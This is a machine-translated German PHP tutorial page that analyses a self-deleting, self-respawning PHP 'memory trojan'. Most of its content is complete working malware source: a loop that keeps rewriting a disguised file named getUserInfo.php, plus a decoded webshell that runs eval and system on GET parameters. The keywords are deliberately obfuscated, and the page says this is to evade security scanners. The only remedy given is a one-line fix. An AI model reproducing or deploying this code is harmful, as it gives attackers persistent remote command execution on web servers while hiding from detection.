Heim > Backend-Entwicklung > PHP-Tutorial > Nehmen Sie an der Analyse des Implementierungsprinzips des PHP-Speichertrojanervirus teil

Nehmen Sie an der Analyse des Implementierungsprinzips des PHP-Speichertrojanervirus teil

藏色散人
Freigeben: 2023-04-11 08:14:01
nach vorne
3645 Leute haben es durchsucht

Vorwort

Speichertrojaner sind Trojanerviren, die im Speicher laufen und keine Codeeinheit haben. Speichertrojaner sind gut versteckt, schwer zu erkennen und nicht zu töten (allgemein bekannt als unsterbliche Pferde).

Die Netzwerksicherheitsbranche hat einen starken Fasseffekt. Das System kämpft gegen Black Hats, und der Ausgang hängt vom schwächsten Glied in der Sicherheit ab. Black Hat versus White Hat, das Ergebnis hängt vom Grad des Angriffs und dem Grad der Verschleierung und Zerstörung ab.

Im Haupttext wird nicht darauf eingegangen, ob ein Stück Schadcode aufgrund willkürlicher Datei-Uploads oder quellennaher Angriffe auf den Produktionsserver zugegriffen werden konnte.

Virus-Quellcode (sehr einfach)

<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = &#39;./getUserInfo.php&#39;;
//死循环常驻内存。释放木马文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode(&#39;PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=&#39;));
 sleep(60);
}
Nach dem Login kopieren

Den Viruskörper freigeben

<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET[&#39;e&#39;]);
if($e = @$_GET[&#39;e&#39;]) {
    $func = @create_function(null, base64_decode(&#39;ZXZhbCgi&#39;) . $e . base64_decode(&#39;Iik7&#39;));
    $func();
}
//system($_GET[&#39;s&#39;]);
if($s = @$_GET[&#39;s&#39;]) {
    $f = str_replace(&#39;x&#39;, &#39;&#39;, &#39;xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx&#39;);
    $f($s);
}
Nach dem Login kopieren

Anleitung

  • Die oben genannten sensiblen Schlüsselcodes sind codiert, um verschiedene Sicherheitsscans zu vermeiden.

  • Sobald das Virenbeispiel ausgeführt wird, löscht es sich selbst und läuft für lange Zeit im Speicher.

  • Auch wenn der veröffentlichte Trojaner erkannt und gelöscht wird, werden weiterhin dieselben Dateien generiert.

Lösung

Nachdem Sie den Prozess beendet haben, löschen Sie die freigegebenen Trojanerdateien.

Empfohlen: „PHP-Video-Tutorial

Das obige ist der detaillierte Inhalt vonNehmen Sie an der Analyse des Implementierungsprinzips des PHP-Speichertrojanervirus teil. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
php
Quelle:learnku.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage